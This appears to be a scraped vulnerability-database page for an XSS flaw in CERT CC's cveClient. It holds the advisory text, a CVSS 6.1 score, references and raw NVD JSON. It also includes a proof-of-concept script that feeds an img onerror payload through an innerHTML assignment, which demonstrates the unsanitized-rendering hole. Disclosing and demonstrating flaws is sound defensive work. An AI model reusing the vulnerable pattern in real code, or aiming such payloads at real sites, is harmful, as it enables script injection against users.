CVE-2026-35466

Description

XSS vulnerability in cveInterface.js allows for inject HTML to be passed to display, as cveInterface trusts input from CVE API services

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

CERT CC cveClient (修复 PR #37 之前的版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
PoC for CVE-2026-35466
This script simulates the vulnerable behavior in cveInterface.js
where input from the CVE API is directly rendered without sanitization.
-->

<script>
// 1. Simulate a malicious response from the CVE API
// In a real scenario, this might come from a compromised API or MitM attack
const maliciousApiResponse = {
  "cve": {
    "id": "CVE-2026-35466",
    "descriptions": [
      {
        "lang": "en",
        // Payload: Injecting an image tag with an onerror handler to execute JS
        "value": "<img src=x onerror=alert('XSS CVE-2026-35466 Executed')>"
      }
    ]
  }
};

// 2. Vulnerable function in cveInterface.js (Simulation)
function renderCveDetails(apiData) {
  const displayElement = document.getElementById('cve-description');
  
  if (displayElement && apiData.cve && apiData.cve.descriptions) {
    // VULNERABILITY: Directly assigning innerHTML with untrusted input
    displayElement.innerHTML = apiData.cve.descriptions[0].value;
    console.log("Content rendered. Check for alert popup.");
  }
}

// 3. Execute the PoC
// Note: Ensure there is a div with id 'cve-description' in the DOM for this to run
renderCveDetails(maliciousApiResponse);
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35466
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35466
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35466/
[4] VulDB https://vuldb.com/cve/CVE-2026-35466
[5] https://github.com/CERTCC/cveClient
[6] https://github.com/CERTCC/cveClient/pull/37

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35466", "sourceIdentifier": "[email protected]", "published": "2026-04-02T21:16:40.687", "lastModified": "2026-04-03T16:10:23.730", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "XSS vulnerability in cveInterface.js allows for inject HTML to be passed to display, as cveInterface trusts input from CVE API services"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/CERTCC/cveClient", "source": "[email protected]"}, {"url": "https://github.com/CERTCC/cveClient/pull/37", "source": "[email protected]"}]}}